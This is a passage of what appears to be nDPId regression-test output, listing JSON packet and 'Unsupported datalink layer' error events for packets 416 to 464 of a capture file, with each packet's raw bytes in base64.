layer","datalink":12,"packet_id":416,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652806726} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":416,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMIMQABABoDRwKi0ArL40DbC2QBQ64tGkd7sbB+wEB6XNpIAAAEBCAoANYp1RwYP4gEBBQre7HGL3uyiVw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":417,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652806748} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":417,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMINQABABoDQwKi0ArL40DbC2QBQ64tGkd7sbB+wEB6XMSQAAAEBCAoANYp3RwYP4gEBBQre7HGL3uynww=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":418,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652806757} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":418,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMIOQABABoDPwKi0ArL40DbC2QBQ64tGkd7sbB+wEB6XK7cAAAEBCAoANYp4RwYP4gEBBQre7HGL3uytLw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":419,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652806776} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":419,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMIPQABABoDOwKi0ArL40DbC2QBQ64tGkd7sbB+wEB6XJkkAAAEBCAoANYp6RwYP4gEBBQre7HGL3uyymw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":420,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652806782} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":420,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMIQQABABoDNwKi0ArL40DbC2QBQ64tGkd7sbB+wEB6XIN0AAAEBCAoANYp6RwYP4gEBBQre7HGL3uy4Bw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":421,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652806851} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":421,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMIRQABABoDMwKi0ArL40DbC2QBQ64tGkd7sbB+wEB6XG2oAAAEBCAoANYqBRwYP4gEBBQre7HGL3uy9cw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":422,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652806851} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":422,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMISQABABoDLwKi0ArL40DbC2QBQ64tGkd7sbB+wEB6XFf4AAAEBCAoANYqBRwYP4gEBBQre7HGL3uzC3w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":423,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652806856} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":423,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMITQABABoDWwKi0ArL40DbC2QBQ64tGkd7swt+AEB7E5vQAAAEBCAoANYqCRwYQWQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":424,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652806938} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":424,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMIUQABABoDVwKi0ArL40DbC2QBQ64tGkd7syEuAEB7x4UsAAAEBCAoANYqKRwYQYQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":425,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652806939} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":425,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMIVQABABoDUwKi0ArL40DbC2QBQ64tGkd7szbeAEB8e27IAAAEBCAoANYqKRwYQYQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":426,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652806993} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":426,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMIWQABABoDTwKi0ArL40DbC2QBQ64tGkd7s0yOAEB9M1gAAAAEBCAoANYqPRwYQdA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":427,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652806996} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":427,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMIXQABABoDSwKi0ArL40DbC2QBQ64tGkd7s2I+AEB950GYAAAEBCAoANYqQRwYQdA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":428,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652806997} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":428,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMIYQABABoDRwKi0ArL40DbC2QBQ64tGkd7s3fuAEB+mys0AAAEBCAoANYqQRwYQdA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":429,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652807068} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":429,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMIZQABABoDEwKi0ArL40DbC2QBQ64tGkd7s3fuwEB+mCpoAAAEBCAoANYqXRwYQdAEBBQre7ONn3uzo0w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":430,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652807068} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":430,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMIaQABABoDDwKi0ArL40DbC2QBQ64tGkd7s3fuwEB+mBS4AAAEBCAoANYqXRwYQdAEBBQre7ONn3uzuPw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":431,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652807137} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":431,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMIbQABABoDCwKi0ArL40DbC2QBQ64tGkd7s3fuwEB+m\/7oAAAEBCAoANYqeRwYQdAEBBQre7ONn3uzzqw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":432,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652807138} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":432,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMIcQABABoDBwKi0ArL40DbC2QBQ64tGkd7s3fuwEB+m+k4AAAEBCAoANYqeRwYQdAEBBQre7ONn3uz5Fw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":433,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652807213} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":433,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMIdQABABoDMwKi0ArL40DbC2QBQ64tGkd7s+ReAEB\/Trz0AAAEBCAoANYqlRwYQpg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":434,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652807290} -00340{"packet_event_id":1,"packet_event_name":"packet","packet_id":434,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMIeQABABoC\/wKi0ArL40DbC2QBQ64tGkd7s+RewEB\/TuNAAAAEBCAoANYqtRwYQpgEBBQre7P6D3u0D7w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":435,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652807346} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":435,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMIfQABABoC+wKi0ArL40DbC2QBQ64tGkd7s+RewEB\/Ts14AAAEBCAoANYqzRwYQpgEBBQre7P6D3u0JWw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":436,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652807424} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":436,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMIgQABABoC9wKi0ArL40DbC2QBQ64tGkd7s+RewEB\/TresAAAEBCAoANYq6RwYQpgEBBQre7P6D3u0Oxw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":437,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652807500} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":437,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMIhQABABoDIwKi0ArL40DbC2QBQ64tGkd7tDseAECABmPsAAAEBCAoANYrCRwYQ7Q=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":438,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652807501} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":438,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMIiQABABoDHwKi0ArL40DbC2QBQ64tGkd7tFDOAECAuk2IAAAEBCAoANYrCRwYQ7Q=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":439,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652807593} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":439,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMIjQABABoC6wKi0ArL40DbC2QBQ64tGkd7tFDOwECAuW+QAAAEBCAoANYrLRwYQ7QEBBQre7R8L3u0kdw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":440,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652807657} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":440,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMIkQABABoC5wKi0ArL40DbC2QBQ64tGkd7tFDOwECAuVnEAAAEBCAoANYrSRwYQ7QEBBQre7R8L3u0p4w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":441,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652807726} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":441,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMIlQABABoC4wKi0ArL40DbC2QBQ64tGkd7tGZ+wECBbUJYAAAEBCAoANYrZRwYRKAEBBQre7R8L3u0p4w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":442,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652807772} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":442,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMImQABABoC3wKi0ArL40DbC2QBQ64tGkd7tGZ+wECBbSyYAAAEBCAoANYrdRwYRKAEBBQre7R8L3u0vTw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":443,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652807813} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":443,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMInQABABoDCwKi0ArL40DbC2QBQ64tGkd7tL0+AECCId3UAAAEBCAoANYrhRwYRRQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":444,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652807814} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":444,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMIoQABABoDBwKi0ArL40DbC2QBQ64tGkd7tNLuAECC2cdsAAAEBCAoANYrhRwYRRQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":445,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652807857} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":445,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMIpQABABoDAwKi0ArL40DbC2QBQ64tGkd7tOieAECDjbDIAAAEBCAoANYrmRwYRUA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":446,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652807860} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":446,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMIqQABABoC\/wKi0ArL40DbC2QBQ64tGkd7tP5OAECEQZpkAAAEBCAoANYrmRwYRUA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":447,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652807863} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":447,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMIrQABABoC+wKi0ArL40DbC2QBQ64tGkd7tRP+AECE9YQAAAAEBCAoANYrmRwYRUA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":448,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652807936} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":448,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMIsQABABoC9wKi0ArL40DbC2QBQ64tGkd7tSmuAECFrW1YAAAEBCAoANYrsRwYRWg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":449,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652808335} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":449,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMItQABABoC8wKi0ArL40DbC2QBQ64tGkd7tT9eAECGYVT4AAAEBCAoANYsWRwYRrw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":450,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652808412} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":450,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMIuQABABoCvwKi0ArL40DbC2QBQ64tGkd7tT9ewECGYpnkAAAEBCAoANYsdRwYRrwEBBQre7Vqv3u1gGw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":451,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652808414} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":451,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMIvQABABoCuwKi0ArL40DbC2QBQ64tGkd7tT9ewECGYoQ0AAAEBCAoANYsdRwYRrwEBBQre7Vqv3u1lhw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":452,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652808486} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":452,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMIwQABABoCtwKi0ArL40DbC2QBQ64tGkd7tT9ewECGYpnEAAAEBCAoANYslRwYRrwEBBQre7VVD3u1lhw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":453,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652808491} -00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":453,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMIxQABABoCkwKi0ArL40DbC2QBQ64tGkd7tT9fQECGYAuMAAAEBCAoANYslRwYRrwEBBRLe7WAb3u1lh97tVUPe7WWH"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":454,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652808562} -00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":454,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMIyQABABoCjwKi0ArL40DbC2QBQ64tGkd7tT9fQECGY7SsAAAEBCAoANYssRwYRrwEBBRLe7Wrz3u1wX97tVUPe7WWH"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":455,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652808735} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":455,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMIzQABABoCqwKi0ArL40DbC2QBQ64tGkd7tZYewECHFb3kAAAEBCAoANYs+RwYSKQEBBQre7Wrz3u1wXw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":456,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652808795} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":456,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMI0QABABoC1wKi0ArL40DbC2QBQ64tGkd7tcF+AECHyM6cAAAEBCAoANYtERwYSNg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":457,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652808797} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":457,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMI1QABABoC0wKi0ArL40DbC2QBQ64tGkd7tdcuAECIgLg0AAAEBCAoANYtERwYSNg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":458,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652808847} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":458,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMI2QABABoCzwKi0ArL40DbC2QBQ64tGkd7tezeAECJNKGEAAAEBCAoANYtJRwYSRA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":459,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652808848} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":459,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMI3QABABoCywKi0ArL40DbC2QBQ64tGkd7tgKOAECJ6IsgAAAEBCAoANYtJRwYSRA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":460,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652808848} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":460,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMI4QABABoCxwKi0ArL40DbC2QBQ64tGkd7thg+AECKnHS4AAAEBCAoANYtJRwYSRQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":461,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652808931} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":461,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMI5QABABoCkwKi0ArL40DbC2QBQ64tGkd7thg+wECKnDNAAAAEBCAoANYtRRwYSRQEBBQre7Yt73u2Q5w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":462,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652809001} -00348{"packet_event_id":1,"packet_event_name":"packet","packet_id":462,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMI6QABABoCbwKi0ArL40DbC2QBQ64tGkd7thg\/QECKn\/MkAAAEBCAoANYtYRwYSRQEBBRLe7ZZT3u2bv97ti3ve7ZDn"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":463,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652809119} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":463,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMI7QABABoCiwKi0ArL40DbC2QBQ64tGkd7tkOewECLV69IAAAEBCAoANYtjRwYSegEBBQre7ZZT3u2bvw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":464,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652809207} 